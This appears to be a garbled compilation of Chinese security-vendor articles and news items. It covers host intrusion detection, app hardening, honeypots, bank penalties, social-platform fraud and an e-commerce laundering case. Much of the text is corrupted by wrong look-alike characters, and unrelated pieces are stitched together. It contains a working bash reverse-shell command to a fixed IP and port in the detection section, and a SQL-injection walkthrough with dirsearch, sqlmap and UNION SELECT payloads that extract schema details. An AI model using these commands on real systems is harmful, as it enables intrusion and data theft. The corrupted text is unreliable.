时就存在找不到的可能，但为了零碎稳定性，能够就义一些数据的准确性。 ...

HIDS（Host-based Intrusion Detection System），即主机入侵检测零碎。 本文会论述一些常见的主机入侵伎俩及对应的检测形式，意在抛砖引玉，欢送交换~ 反弹 Shell反弹 shell 的实质是把 bash 或 sh 过程的输入输出重定向到 socket，在 socket 中获取 stdin[0]，stdout[1] 和 stderr[2] 输入到 socket。因为过程通信有较高的复杂性，所以 bash 的输入输出可能是一个 pipe。 通过 /bin/bash 反弹 shell一个经典的反弹 shell 如下： # 先启动 servernc -lvv 9999# 再启动 client/bin/bash > /dev/tcp/10.211.55.2/9999 0>&1 2>&1 &反弹胜利后，/bin/bash 的 file descriptor(0 1 2) 会被重定向。server 上能够管制 client 的 /bin/bash 过程的 0 1 2。 现实状况下，如果反弹 shell 的实质能够演绎为 file descriptor 的重定向，那么检测所有过程的 file descriptor 是否被重定向即可。失常状况下 0 1 2 都不会被重定位给一个 server。 ...

有哪些典型的 web app? 比方一个博客 仓库模式是什么 数据安全与 csrf 攻打 其它材料1https://github.com/qianyugang/learn-laravel 其它材料1 作者1https://github.com/johnlui/Learn-Laravel-5 其它材料1 作者2https://ithelp.ithome.com.tw/articles/10228168 其它材料 被标记为新体验式https://codecourse.com/courses/enums-in-laravel php enums 其它材料1 参考书的作者3laravel-best-practices 其它材料 被标记为进阶内容Diving Laravelfrom -前端平安系列：如何避免XSS攻打？ 12

一名合格的网安工程师，不仅要懂得防破绽，更要学会找破绽。 上期直播咱们为大家解说了红队打点与情报收集策略的具体内容，本期咱们将从具体的破绽实战动手，带大家来一场酣畅淋漓的靶机破绽实战。 靶机破绽即通过虚拟环境和定制的有破绽的Web应用程序模仿实在的破绽，让用户尝试实际网络安全攻防技巧，并学习如何利用这些破绽来爱护本人的零碎。 3月9日，咱们邀请到了顶象网络安全专家库讲师谢文杰给大家讲讲对于靶机破绽那些事儿 ——《小白如何从靶场过渡到实战》。 本期主讲嘉宾——谢文杰，资深网络安全技术专家。 领有4年浸透测试教训，曾任职奇安信。实战经验丰盛，参加过补天、edu高校破绽开掘，补天排名前1000、edu排名榜前100，领有高校破绽证书和cnvd原创证书，参加过hw有粤盾、飞鸿杯以及外部攻防演练等。 同时，顶象也欢送各位圈内圈外大佬以及相干客户积极参与到咱们第二季的业务平安大讲堂直播流动中来，有动向的可增加小助手沟通参加。 本期直播奖品也做了全新降级，奖品包含但不仅限于：**1、联结出书的署名权机会；2、现金处分；3、顶象周边。** 超多精彩，千万别错过哦！ Tips：本期直播将在顶象视频号&钉钉&B站顶象直播间&CSDN顶象技术直播间多平台同步直播，感兴趣的同学记得肯定要提前锁定直播间哦！ 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

在山寨这个畛域，没有人比黑灰产更懂模拟。 据平安从业者介绍，一般而言，对于成熟的山寨开发者来说，几天工夫内就能够做出一套前端框架。服务器、源代码、域名、服务商这些内容的创立，通过网上租赁的形式就能够解决。比方，一款苹果利用商城里上线的App，黑灰产能达到1:1级别的复制，报价高达近三万元，20天就能竣工。 如果想要让这些仿冒App胜利上线苹果或者安卓的利用商店，只须要在完工后领取相应的费用即可。 而山寨开发者之所以能如此疾速复刻出App，其实是对App 进行了反编译或篡改工作。 防篡改重要性防篡改顾名思义就是通过技术手段让逆向工程师们不能篡改某个App 中的要害信息，进而起到App 加固的作用。 如果没有APP加固实现防篡改，那么攻击者插入恶意代码就能够达成两方面的攻打向量： 1、对于App用户而言，插入恶意代码的App流传进来能够进行钓鱼、电信欺骗等操作，用户会有资产或其余损失； 2、对于App 服务端而言，攻击者就能够利用客户端与服务端的一些接口对服务端进行攻打，对App造成相应的舆论和声誉损失。 App 加固中的防篡改原理那么，App 加固中的防篡改到底是如何实现的呢？ 咱们无妨从App 的开发讲起。 一个App 大抵由开发者、App、包名、证书、签名组成。如果把开发者比作父母，那么App就是孩子，包名则是孩子（App）的姓名，证书则是孩子(App）的出生证明，签名则是身份证号码。 与新生婴儿相似，当开发者实现App 的开发时，App 只有姓名这一个能够证实其身份的货色，此时也很容易会产生“狸猫换太子”的状况。为了保障孩子的平安，父母就须要给孩子筹备出生证明，而后再应用出生证明给孩子生成一个身份证号码，证实孩子的身份。 对于攻击者而言，要想拐走这个“孩子”，有两种形式： 一是通过盗取证书进行信息篡改，即对App 的证书进行攻打，包含证书文件自身、证书私钥、证书私钥别名，一旦攻打胜利，他就能够以开发者的身份对App 进行篡改，但一般而言证书不会轻易泄露。 二是绕过签名与包名校验，间接对App 自身进行批改。这就相当于人贩子拐走了小孩，怎么看待被拐走的孩子是人贩子的事件。 理解了这个原理后，咱们就比拟好了解如何防篡改了。 要想保障App 不被篡改，咱们要做的就是保障App 的包名、签名、证书等信息的平安。 个别做法是提前收集利用的包名、证书、签名并记录在册，当攻击者应用伪造的证书生成了伪造的签名，咱们就能够疾速辨认出你的身份信息与记录在册的信息是不符的，这样咱们的加固程序就能够回绝应用这个App。 当App 呈现闪退、解体等操作时，咱们就能够思考是不是咱们应用的是混充的App了。 App加固中的防篡改伎俩有哪些？总的来说，防篡改能够通过加壳、资源加密 代码混同、虚构执行等伎俩来实现。 1、加壳即通过对 DEX 文件进行加壳防护能够抉择整体 DEX 加固或者拆分 DEX 加固的形式，暗藏源码避免间接性的反编译。拆分 DEX 加固须要留神 DEX 文件的数据结构，选取 classdata 和 classcode 这两局部，即便拆分进去也不会泄露 class 数据和字节码数据，反编译进去也不残缺，安全性较高。 2、资源加密即对软件包中的图片、音频、视频等资源文件进行加密，避免被攻击者替换或篡改。 3、代码混同即对编译好的class文件进行混同解决，解决后的代码与解决前代码可能实现雷同的性能，但混同后的代码很难被反编译，即便反编译胜利也很难得出程序的真正语义。 4、虚构执行行将原始化代码编译为动静的DX-VM虚拟机指令，运行在DX虚拟机之上，无奈被反编译回可读的源代码。 但正如咱们在上篇代码混同的科普文章中提到的，仅靠代码混同、防篡改是无奈防住黑灰产的，在利益背后，他们总有方法找到破绽。 因而，对于App 加固而言，最好的方法是多管齐下，对App 加固进行多重防护。比方字符串加密、控制流平坦化、指令替换、符号混同、混同多样化、不通明谓词、防动静调试、防动静注入、HOOK检测、代码段测验、完整性校验等等多种技术手段。 只有这样，能力防患于未然。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

农信机构立足中央“三农”，广泛规模较小，高地区集中度在县域和农村地区，容易受到中央农村经济脆弱性的影响。 农信机构因为信贷我的项目要求多，单笔贷款业务批复的额度绝对较小，在信用档案注销环节，造成业务量和工作量绝对较多。同时，信用信息采集不够准确，不能全面且正当地评定农民信用等级，最终后果就是贷款主题的信用评级被高估，局部贷款主题取得超出理论所需额度的贷款，不能予以偿还，进步了农信零碎的不良率。 农信社信贷广泛面临担保条件难以落实、营销经营老本高、人员操作道德风险大、客户授信主观化、办理速度慢等问题。 数字化转型是一场科技反动，可能精准解决农村普惠金融推动过程中的痛点。农信社以数字综合治理为契机，增强数据全周期治理，建设数据治理长效机制，晋升农信社外围竞争力，为数字化转型奠定根底。多动作晋升翻新研发和数字利用能力。 河南农信的数字化实际农信零碎改革，是2023年银行业的“重头戏”。11月23日，《河南日报》报道了河南省农信社改革停顿。据报道，河南省农信社改革方案已取得银保监会批复，将通过组建河南农商联结银行，自上而下理顺股权结构，欠缺公司治理，推动零碎重塑，晋升全省农信社体系衰弱度，充分发挥其中央金融“压舱石”的作用。基于对本身的调研、思考和摸索，河南农信给出了数字化转型的应答之策。 建设高效的数字化架构。通过构建数字化的IT撑持平台，造成数据开发、共享、应用和治理流程机制，实现向古代银行、智慧银行的数字化转型，将存贷汇、融资理财、在线信贷、金融征询等标准化产品嵌入各种场景，把金融服务融入客户工作和生存，从而吸引客户、留住客户，加强客户的黏性和忠诚度。 建设数字化授信体系。全面推动农户、个体商户、社区居民的信息采集、加工、评估和保护、放慢客户信息系统建设和大数据技术利用，对小微经营户、农户信用风险进行数量化准确计量，通过采集高度简化的现场主观信息和互联网大数据信息，实现低成本、高效率、主观精确的授信决策。 加强业务危险管理水平。使用大数据、人工智能、建模等技术，引入顶象无感验证，施展智能风控的决策反对作用，构建和一直优化风控分析模型，建设营销、评级、授信、用信、审批、预警、清收等端到端的反馈机制，强化贷前、贷中、贷后全流程风险管理，从根本上晋升危险防控效率和程度。 优化线上营销服务。发展范畴宽泛、影响力大的线上营销流动，统筹安排和无效反对精准营销流动，发展线上营销培训，进步全员线上营销服务意识和能力;要通过数据整合、数据分析和数据运算，造成数据洞察能力，对客户进行精准画像，采取穿插销售，定向举荐等差异化营销策略，实现精准营销、智能营销。 验证码助力数字化转型验证码是智能风控的重要组成部分，作为人机交互界面经常出现的要害因素，是身份核验、防备危险的重要组成，也是用户交互体验的第一关口，广泛应用金融服务上。 2020年2月，中国人民银行公布新版《网上银行零碎信息安全通用标准》提出，从零碎形成、客户端运行环境、短信/图形验证码、生物特色、通信链路等环节要求。特地提到，金融机构应通过行为剖析、机器学习等技术一直优化危险评估模型，联合生物探针、客户行为剖析等伎俩，切实晋升平安防护能力。 2020年7月，中国银保监公布《商业银行互联网贷款治理暂行办法》，要求商业银行该当对互联网贷款业务建设全面等下管理体系，在贷前、贷中、贷后全流程进行危险管制。 顶象无感验证以进攻云为外围，集13种验证形式，多种防控策略，以智能验证码服务、验证决策引擎服务、设施指纹服务、人机模型服务为一体的云端交互平安验证零碎。其会集了4380条危险策略、112类危险情报、笼罩24个行业、118种危险类型，防控精准度>99.9%，1天内便可实现从危险到情报的转化，行业危险感知能力实力增强，同时反对平安用户无感通过，实时反抗处理能力更是缩减至60s内。 截至目前，顶象无感验证已为100多家金融机构提供业余服务。 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

1.关上指标网站 2.信息收集，应用dirsearch对网站进行目录扫描 python dirsearch.py -u xxx.com -e *python dirsearch.py -u xxx.com -e phppython dirsearch.py -u xxx.com -e jsp* 示意扫描PHP和JSPphp 示意扫描PHPjsp 示意扫描JSP 3.剖析扫描后果200->通路403/404无奈联通 所以咱们查看对象是绿色字体的200的返回目录咱们能够一个一个的尝试，发现存在一个叫/cms的目录，进入看看 4.发现这个才是实在的站点，后面那个只是钓鱼页面 接下来咱们察看一下这个页面，是否存在交互点 咱们先应用sqlmap对指标站点进行sql注入尝试 python sqlmap.py -u xxx.com --dbssqlmap给出的后果是： [17:34:47] [WARNING] GET parameter 'id' does not seem to be injectablesqlmap没有发现注入点，咱们尝试手动注入，从搜寻框开始 5.手动注入 ' union select 1,2,3 #发现存在3个回显点 ' union select 1,2,database() #胜利提取到数据库名sqlgunnews 'union select 1,2,table_name from information_schema.tables where table_schema=database() #胜利提取到数据库表名 admin2class2news2system ' union select 1,2,column_name from information_schema.columns where table_name='admin' #胜利提取到admin表的字段 ...

为了捕捉猎物，猎人会在设置鲜活的钓饵。被引诱的猎物去吃钓饵时，就会坠入猎人安排好的陷阱，而后被猎人擒获，这是狩猎中罕用的一种伎俩。在业务平安进攻中，也有相似的进攻攻打的办法，业内称之为“蜜罐”。 “蜜罐”是一种主动防御技术，通过模仿一个或多个易受攻击的破绽或缺点诱导攻击者动员攻打，从而收集捕捉攻打流量和样本，剖析出攻打伎俩、发现网络威逼、提取威逼特色，是一个与攻击者进行攻防博弈的过程。 蜜罐有很多利用模式蜜罐的利用很宽泛，在不同场景下设置有不同捕捉攻打的形式。 邮箱蜜罐。防御者会成心放进去的测试邮箱账号，攻击者利用扫描器发现这些账号，发送钓鱼或病毒邮件后，会被邮箱蜜罐进行威逼标记，并将发件人的IP起源等退出黑名单中，以避免后续的威逼攻打。 爬虫蜜罐。防御者在网站、App上设置一些虚伪的网页链接，这写虚伪网页，只有爬虫才可能拜访到，而失常用户无奈看。当歹意爬虫发现这些页面且进行抓取后，爬虫蜜罐会对相干IP进行封禁，并剖析其爬取行为。 网络蜜罐。防御者在内网或者公网部署一个或多个网络破绽，当攻击者利用破绽扫描、攻打的时候，蜜罐可能捕捉攻击者行为、IP地址、特色等，并将其隔离。 APP蜜罐。在应用程序中预置一些看似有用的但实际上是陷阱的数据或代码，来吸引攻击者的注意力并裸露他们的攻击行为，从而进步应用程序的安全性。防御者在App上设置一个或多个破绽，诱导攻击者扫描，检测发现后，把握了攻击者的攻打信息，还要对攻击者的攻打工具、门路、用意等进行进一步剖析才能够寻找本身零碎及进攻破绽，针对性查漏补缺。 随着技术的倒退，蜜罐与新技术利用相交融，从独自的产品服务，并成为很多平安服务的集成模块。例如，顶象APP加固集成“蜜罐”技术，可能辨认探测可疑攻打，回绝歹意指令执行，当攻击者者进入的一瞬间，其操作和行为的所作所为都将被蜜罐残缺记录下来，成为防守方手中的重要信息。 蜜罐技术让App加固攻守兼备作为顶象进攻云的一部分，顶象端加固反对安卓、iOS、H5、小程序等平台，独有云策略、业务平安情报和大数据建模的能力。能无效进攻内存注入、Hook、调试、注入、多开、内存Dump、模拟器、二次打包和日志泄露等攻打威逼，避免App遭入侵、篡改、破解、二次打包等歹意侵害，其独有“蜜罐”性能、爱护Android 16种数据和文件，提供7种加密模式，率先反对对iOS免源码加固。 集成蜜罐技术的顶象App加固，提供了攻守兼备的平安能力。 收集入侵信息，并提供平安情报。蜜罐可能记录任何扫描、探测和入侵尝试的信息，有助于确定新呈现的威逼和入侵，也有助于打消盲点，帮忙防御者利用收集达到的信息进行针对性的进攻措施。 蛊惑攻击者，挫败入侵行为。当攻击者浸透App位于外破绽，也得不到任何有价值的材料，因为其入侵的是陷阱，也就是蜜罐的制作的沙箱。 发现潜在隐患，欠缺平安防护。当攻击者入侵蜜罐陷阱后，进攻人员只须要从蜜罐中提取攻击者的攻打伎俩，以此发现更多潜在破绽，并用查漏补缺，进一步加固App。 顶象端加固的三大性能顶象端加固为App提供平安加固、危险预警及全生命周期风控保障，满足平安合规的各项要求。 全方位保障App平安。顶象端加固可能针对已有利用进行安全性检测，发现利用存在的危险破绽并针对性进行修复整改，对敏感数据、代码混同、代码完整性、内存数据等进行爱护，从源头上防止系统漏洞对于利用自身造成的平安影响，保障App平安。 为App提供实时危险预警。基于进攻云，顶象端加固可能为App提供挪动利用运行进行平安监测，对挪动利用运行时终端设备、运行环境、操作行为进行实时监测，帮忙App建设运行时危险的监测、预警、阻断和溯源平安体系。 为App建设全生命周期防控体系。App 利用平安加固出现常态化、泛边界化和专业化的趋势，这意味着企业本身简略的防护曾经无奈满足以后网络安全防护的新趋势，亟待建设更为全面的平安进攻体系。顶象端加固从App的设计、开发、公布、保护等全生命周期环节解决挪动利用在外围代码平安、逻辑平安、平安功能设计、数据传输链路平安等多个维度的问题，助力筑牢平安防线。业务平安大讲堂：立刻报名业务平安产品：收费试用业务平安交换群：退出畅聊 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

近日，人民银行颁布了2023年首批行政处罚罚单，引发业内宽泛关注。 顶象进攻云业务平安情报中心统计了人民银行官网，2020年1月至2023年2月10日期间，颁布的101份行政处罚。 统计显示，16家金融机构被罚27066.9万元，波及国有银行、股份制银行、城商行、银行卡机构、证券公司。其中，4家股份制银行收到罚单最多，别离是15份、13份、11份，3年内别离被罚3554.3万元、2483万元、2951万元和2405万元。然而被罚款最多是一家银行卡机构，收到6542.5万元的罚款。 在被罚责任人来看，银行的合规部门（蕴含法律合规、内控合规、合规部等）和信用卡核心，收到的罚单最多，其次是在运营部、批发金融部（集体金融）、公司业务（蕴含小微金融）的管理人员。 统计显示，有54个罚单是因为金融机构“未按规定履行客户身份辨认任务”，占罚单总数的27%；其次是“未按规定报送大额交易报告或可疑交易报告”、“与身份不明的客户进行交易或者为客户开立匿名账户、假名账户”、“未按规定保留客户身份材料和交易记录”、“违反信用信息采集、提供、查问及相干治理规定”、“违反账户治理规定”，别离有44（22%）、26（13%）、20（10%）、14（7%）、12（6%）个罚单。 这些行政罚单理由别离有什么含意呢？各违反了哪些监管法规呢？ 未按规定履行客户身份辨认任务什么是客户身份辨认？ 《金融机构客户身份辨认和客户身份材料及交易记录保留治理方法》有明确的定义：金融机构该当勤勉尽责，建立健全和执行客户身份辨认制度，遵循“理解你的客户”的准则，针对具备不同洗钱或者恐怖融资危险特色的客户、业务关系或者交易，采取相应的措施，理解客户及其交易目标和交易性质，理解理论管制客户的自然人和交易的理论受益人。并依照平安、精确、残缺、窃密的准则，妥善保留客户身份材料和交易记录，确保能足以重现每项交易，以提供辨认客户身份、监测剖析交易状况、考察可疑交易流动和查处洗钱案件所需的信息。 “未按规定履行客户身份辨认任务”，就是没有按相干规定对客户身份进行辨认。客户身份辨认是反洗钱系列工作的根底，而客户危险评级则为客户身份辨认提供领导，只有迈出辨认客户无效信息的第一步，能力在后续跟进过程中真正地防备客户的洗钱行为。 依据《反洗钱法》第三十二条规定，金融机构未依照规定履行客户身份辨认任务的，由国务院反洗钱行政主管部门或者其受权的设区的市一级以上派出机构责令限期改过；情节严重的，处二十万元以上五十万元以下罚款，并对间接负责的董事、高级管理人员和其余间接责任人员，处一万元以上五万元以下罚款。 未按规定报送大额交易报告或可疑交易报告大额交易或可疑交易报告是为避免利用金融机构进行洗钱流动，用于遏制洗钱立功、恐怖融资，预防洗钱，保护金融平安。 《金融机构大额交易和可疑交易报告治理方法》明确提出，当日单笔或者累计交易人民币5万元以上（含5万元）的缴存或支取；非自然人银行账户与其余的银行账户产生当日单笔或者累计交易人民币200万元及以上，自然人银行账户与其余的银行账户产生当日单笔或者累计交易人民币50万元以上（含50万元）的境内款项划转；自然人银行账户与其余的银行账户产生当日单笔或者累计交易人民币20万元以上（含20万元）的跨境款项划转等均属于大额交易。并要求金融机构，制订本机构的交易监测规范，并对其有效性负责，包含并不限于客户的身份、行为，交易的资金来源、金额、频率、流向、性质等存在异样的情景。 《反洗钱法》第三十二条也规定，金融机构该当依照规定执行大额交易和可疑交易报告制度。办理的单笔交易或者在规定期限内的累计交易超过规定金额或者发现可疑交易的，该当及时向中国反洗钱监测剖析核心报告。 2月初，浙江省湖州一女士发视频示意，本人去银行存款5万元，但银行工作人员要求她出具支出证实。还被问到“在哪里工作？钱从哪里来？”这位女士感觉本人像个“囚犯”。其实，银行是按照《金融机构大额交易和可疑交易报告治理方法》的规定来执行。 未按规定保留客户身份材料和交易记录保留客户身份材料和交易记录，一方面是金融机构履行客户身份辨认和交易报告任务的记录和证实，另一方面为发现可疑交易提供根据，同时为违法犯罪流动的考察、侦察、起诉、审判提供必要证据。 《金融机构客户渎职考察和客户身份材料及交易记录保留治理方法》第四十四条规定，金融机构该当保留的客户身份材料包含记录客户身份信息以及反映金融机构发展客户渎职考察工作状况的各种记录和材料。包含对于每笔交易的数据信息、业务凭证、账簿以及无关规定要求的反映交易真实情况的合同、业务凭证、单据、业务信件和其余材料。 《反洗钱法》第十九条要求，在业务关系存续期间，客户身份材料产生变更的，金融机构该当及时更新客户身份材料。业务关系完结后、客户交易信息在交易完结后，客户身份材料该当至多保留五年。 违反信用信息采集、提供、查问及相干治理规定信用信息是指依法采集，为金融等流动提供服务，用于辨认判断企业和个人信用情况的根本信息、借贷信息、其余相干信息，以及基于前述信息造成的剖析评估信息。 信用信息就像集体或机构的“经济身份证“，如果信用记录良好，就可能疾速取得贷款、信用卡，享受低利率；如果信用记录不好，将会间接对购房、购车、申领信用卡等信贷行为产生影响，不利于取得贷款、信用卡，利率可能较高。 违反信用信息采集、提供、查问及相干治理规定是近两年处罚的重点之一，次要起因是查问、获取的时候的滥用。 《征信业务管理方法》， 征信机构该当严格限定公司外部查问和获取信用信息的工作人员的权限和范畴。留存工作人员查问、获取信用信息的操作记录，明确记录工作人员查问和获取信用信息的工夫、形式、内容及用处。信息使用者应用征信机构提供的信用信息，该当基于非法、正当的目标，不得滥用信用信息。 违反账户治理规定银行账户是客户在银行开立的贷款账户、贷款账户、往来账户的总称，是对银行业务及财务流动所引起的资金来源与资金运用进行明细和汇总的分类记录和反映。 《人民币银行结算账户治理方法》规定，银行结算账户的开立和应用该当恪守法律、行政法规，不得利用银行结算账户进行偷逃税款、逃废债权、套取现金及其他违法犯罪流动。 2021年日，奉贤警方侦破一起帮忙信息网络犯罪活动罪案件，抓获9名立功嫌疑人，其中居然有银行工作人员作为“内鬼”施行作案，利用职权之便帮忙涉诈人员违规设立对公账户多达32个。银行账户成为了电信欺骗和洗钱团伙的高级“立功工具”。《反电信网络欺骗法》要求，银行机构要履行反洗钱、反诈职责，建设渎职考察制度，对涉诈异样银行卡、可疑交易等进行监测处理。 金融欺诈更加复杂多变“未按规定履行客户身份辨认任务”，、“未按规定报送大额交易报告或可疑交易报告”、“与身份不明的客户进行交易或者为客户开立匿名账户、假名账户”、“未按规定保留客户身份材料和交易记录”、“违反信用信息采集、提供、查问及相干治理规定”、“违反账户治理规定”等，别离波及反洗钱、征信治理、个人信息爱护，是近年来金融机构领罚单的“重灾区”。 归根结底，还是要判断真伪，保障客户信息、交易的真实性。顶象从数据、行为、模型、剖析多方面，帮忙金融核验身份和信息的真伪。业务平安大讲堂：立刻报名业务平安产品：收费试用业务平安交换群：退出畅聊 业务平安大讲堂：立刻报名 业务平安产品：收费试用 业务平安交换群：退出畅聊

随着挪动互联网的倒退，社交媒体进入“人人皆媒”时代。社交不再仅仅满足于用户即时通讯的需要，还承载了在线领取、内容分享等等的多元性能，正一直刷新着用户日常沟通、购物和娱乐的体验，且用户规模在逐年减少。 数据显示，2019年中国社交网络用户规模未然达到8.62亿人，2022年中国社交网络用户整体冲破10亿人，整体市场规模将达到2500亿左右。 在社交人群方面，老年人正在成为互联网的“新生代”。 QuestMobile数据显示，2022年一季度，挪动互联网迎来了一次流量增长小顶峰。截至3月底，月沉闷用户规模达11.83亿人，月人均应用时长达到了162.3小时，同比增长12.1％。 其中，40岁以上中老年群体成为一季度用户增长的次要起源。在具体的年龄散布上，41-50岁的群体增长0.4％，51岁及以上群体增长1.6％，40岁及以下年龄段均为下滑状态。 《中国老龄产业倒退报告》显示，2014年到2050年，我国老年人口的生产规模将从4万亿元增长到106万亿元左右。于是，在“银发经济”方兴未艾的大背景下，具备带货和推广能力的中老年博主则成为了品牌争抢的对象，也成为平台获取用户增量的“新利器”。 在营销策略上，为了吸引更多的用户，经营方会以处分的形式激励用户一直拉新；同时为了晋升平台活跃度也会时不时推出点赞、投票等流动。 在社交平台宏大的用户规模以及日趋升高的社交需要推动下，社交平台的拉新伎俩也是花样百出，营销投入每年超百亿，这也让黑灰产嗅到了商机。 早在2018年8月，央视《焦点访谈》就曾报道电商平台的局部商家为谋求销量，将资金用于刷单引流，晋升搜寻热度排名，存在电商刷单利益输送等问题； 2019年12月，一则无关“央视揭带货圈黑幕”的话题冲上微博热搜，再次曝光了在电商、“种草”平台上，大量个人专门组织刷评论、刷点赞、刷珍藏的产业链。 2022年双十一期间，顶象进攻云业务平安情报中心监测到，某社交媒体平台遭逢持续性的歹意爬虫攻打，用户信息和原创内容被批量盗走，经分类梳理和初步加工后，被黑灰产转售给竞争对手或间接用于歹意营销。由此不仅给用户造成隐衷和信息泄露，更给社交媒体平台的数字资产带来间接损失，毁坏了内容产业的衰弱倒退。 2022年度社交平台危险剖析随着社交平台的倒退，注册用户量越来越高，局部用户心愿通过不正当的形式疾速失去更多的流量，取得更多人的关注。正因为这类需要的存在，才让黑灰产有了可乘之机。从社交账号的批量注册、批量养号，到账号公布不合规的信息、批量刷赞刷评论，再到上游的成品账号转卖，甚至到网络欺骗等等，黑灰产的伎俩堪称层出不穷，防不胜防。 1）刷资助力和批量注册最容易成为黑灰产攻打指标。 监测发现，2022年社交平台的次要危险集中在垃圾注册、异样登录、批量养号、刷资助力、刷评论、数据爬虫等6个方面。其中，刷资助力场景危险最高，为27.76%，其次为垃圾注册相干危险，为20.61%。 2）黑灰产已渗透到社交各个环节 从2022年社交平台各个危险节点来看，整体散布较为平均，均匀在8%左右浮动，社交作为日常化的需要，虽没有体现出显著的淡旺季，但这在肯定水平上阐明了黑灰产曾经渗透到社交平台的各个环节。 就2022年社交平台的危险而言，4月、7月、8月风向绝对较高。 3）手机黑卡是黑灰产的次要舞弊工具 从黑灰产的行为特征分析来看，手机黑卡是黑灰产应用最多的舞弊工具，占比23.31%。同时黑产还尝试应用伪造的设施指纹token发动申请，或以间接刷接口的形式进行攻打，使得风控引擎无奈辨认到非法的设施指纹，为规避监控，黑灰产还尝试高频切换IP、设施、用户ID等形式进行攻打。4）安卓端危险最高 从设施危险来看，绝大部分的申请来自安卓端，iOS端仅仅占1.35%。其中辨认到为安卓模拟器的占比最高，占37.87%。其次为多开和debug攻打等。 社交平台黑灰产舞弊伎俩剖析从社交账号的批量注册、批量养号，到账号公布不合规的信息、批量刷赞刷评论，再到上游的成品账号转卖，甚至到网络欺骗，黑灰产简直渗透到了社交平台的各个环节，其次要舞弊伎俩为以下6种： 1）垃圾注册 垃圾注册是指通过脚本或自动化工具实现自动化批量注册的行为，为非实在用户自己注册。通过批量注册，黑产一方面能够骗取平台领取的大额的拉新奖励金；另一方面，可为后续在平台进行黑灰产行为做账号储备。 2）异样登录 在实现批量注册后，黑灰产会应用模拟器等工具，并高频切换IP来批量登录账号。同时黑灰产也会通过在互联网中收集到的已泄露的用户和明码信息，利用自动化工具（如脚本）去社交网站接口批量提交账号密码组合，尝试在社交平台进行批量登录。 3）批量养号 黑灰产每日通过自动化工具对已注册的大量账号批量进行打卡签到、实现每日工作等，使账号可持续取得成长积分，晋升账号等级，从而晋升账号的权限，并为前期成品账号发售做筹备。 4）刷资助力 黑灰产应用批量注册的非实在用户账号，通过批量操作工具在短期内对平台中的指定内容或指定用户进行集中点赞、助力、关注等。疾速晋升指定内容的热度，从而取得更多的流量。 5）刷评论 黑灰产通过脚本工具，在社交平台评论区高频地公布垃圾信息（大多为不合规的广告信息）。或应用大量储备的账号，为指定用户提供批量的刷评论服务。 6）数据爬虫 网络爬虫通过模仿真人浏览的行为，对社交平台上的用户信息等进行批量的采集。对于数据进行积淀和加工后进行售卖。 社交平台如何应答？对于社交行业而言，用户拉新是其不变的“KPI”，与此同时，一直翻新的营销花色及水涨船高的营销投入则为黑灰产提供了长期作案的“温床”。 因而，对于社交平台而言，须要构建多维度进攻体系，从电商的各个环节动手，同时，电商平台本身也要制订严格的管控要求，对行业内呈现舞弊行为的集体或企业进行严厉打击，一起构建更加偏心通明的市场秩序，打造良好的内容生态。 因而，可定期对平台、App的运行环境进行检测，对App、客户端进行平安加固，对通信链路的加密，保障端到端全链路的平安。其次，部署基于顶象进攻云、风控引擎和智能模型平台，构建多维度进攻体系。 针对批量注册类的舞弊软件，客户端可集成平安SDK，使其定期对App的运行环境进行检测，对于存在代码注入、hook、模拟器、云手机、root、越狱等危险可能做到无效监控和拦挡。 针对批量注册行为的危险特色，可将电商注册场景的申请接入业务平安风控系统。将终端采集的设施指纹信息、用户行为数据等传输给风控系统，通过在风控系统配置相应的平安防控策略，无效地对危险进行辨认和拦挡。 平安产品 举荐顶象风控引擎。依据业务查问场景的申请、客户端采集的设施指纹信息、用户行为数据行为（鼠标的滑动轨迹、键盘的敲击速率、滑动验证码的滑动轨迹、速率、按钮点击等行为轨迹等），实现对歹意“爬虫”行为的无效辨认，基于平安防控策略，无效地歹意爬取行为进行辨认和拦挡。 顶象智能模型平台。基于业务、爬取危险与反爬策略变动，构建专属风控模型，实现安全策略的实时更迭，从而无效拦挡各种歹意爬取危险。

流动工夫：2023年2月23日 15:00-16:00流动模式：线上直播课程介绍Artifactory是反对全语言的通用制品治理平台，随着企业制品存储数量的逐步减少，企业的磁盘空间曾经无奈满足现有的制品增长，须要进行制品清理。本期在线课堂咱们将一起来学习如何清理Artifactory上的制品，自定义不同场景的清理规定。  课堂收益理解Artifactory制品从存储到删除的过程，联合AQL、JFrog CLI等实现自定义场景的清理规定。  课程纲要理解Artifactory制品存储及清理过程理解AQL理解 JFrog CLI手把手学习制品清理的规定与实际 课堂流动本次流动讲师会在完结前进行抽奖奖品一：JFrog飞盘 3个奖品二：JFrog 小礼品5个        讲师介绍郭运宗/JFrog (中国) 解决方案架构师多年一线DevOps转型及交付教训，专一于DevOps，自动化，容器化，致力于落地企业DevOps转型。目前在JFrog（中国）负责互联网及金融行业客户容器化利用生命周期治理、制品库建设和DevOps整体解决方案。   报名形式扫描下方二维码，即可报名参会。

最近热播的电视剧《狂飙》中有这样一个故事情节，刑满释放的唐小虎出狱之后，大哥高启强就慷慨的赠予唐小虎一家游戏厅。但其外表上是游戏厅，实际上背地却暗藏赌场。而在起初的剧情中，这样的套娃模式也揭示了强盛团体最终的败局。 毕竟，纸究竟是包不住火的。 近日，据中国青年报报道，电视剧《狂飙》的剧情在事实中实在演出了。 报道称，江苏宿迁警方发现有人借助电商平台替赌博网站洗钱，涉案金额高达6.6亿元，嫌疑人从中获利2000余万元，涉案店铺66家。 在百度中键入借电商平台行赌博之实关键字，其相干搜寻后果高达5800000个。 披着电商外衣行洗黑钱之实那么，他们到底是如何洗钱的？ 报道称立功嫌疑人因熟知各大电商平台的治理规定，遂通过网络租借身份证、营业执照等信息，用修图软件伪造品牌授权书，骗取电商平台认证，顺利开明店铺，再简略上架几种小家电产品后就开始营业。 之所以抉择售卖小家电，是因相较数码产品、化妆品等商品，售卖小家电的店铺领取给电商平台的手续费更低。 而这些店铺的订单，由他们“自卖自买”。他们大量洽购“买家号”，从网店买入“商品”后，再通过购买来的货运单号虚伪发货，最初他们再点击“确认收货”，实现网购交易流程。 但他们这么做的目标并不是为了刷单，而是以电商平台为幌子，不便他们洗黑钱。 21年初，他们通过境外网站退出了一个名为“四方平台”的群聊。 